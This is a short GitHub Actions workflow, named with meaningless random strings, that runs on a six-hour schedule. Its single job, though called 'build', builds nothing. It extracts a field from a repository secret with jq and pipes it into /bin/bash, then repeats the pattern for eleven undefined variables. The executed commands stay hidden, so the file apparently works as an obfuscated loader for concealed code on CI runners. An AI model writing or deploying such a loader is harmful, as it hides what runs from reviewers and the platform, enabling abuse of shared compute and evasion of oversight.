name: taoshiwang1234
on:
  workflow_dispatch:
  schedule:
    - cron: '56 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taoshiwang1234
        env:
          pqwjf1: ${{ secrets.pqwjf1 }}
        run: |
          echo $pqwjf1 | jq -r .ur98040 | /bin/bash
          echo $j743 | jq -r .dab0991 | /bin/bash
          echo $rkk1801 | jq -r .b31 | /bin/bash
          echo $sc2 | jq -r .ena84 | /bin/bash
          echo $dh15138 | jq -r .qnci49659 | /bin/bash
          echo $zh643 | jq -r .i81 | /bin/bash
          echo $n9 | jq -r .d19 | /bin/bash
          echo $wznp6943 | jq -r .do5 | /bin/bash
          echo $nkbad9 | jq -r .hrrya05290 | /bin/bash
          echo $cc05 | jq -r .nshso77344 | /bin/bash
          echo $a5434 | jq -r .xpjr4588 | /bin/bash
          echo $p192 | jq -r .u352 | /bin/bash

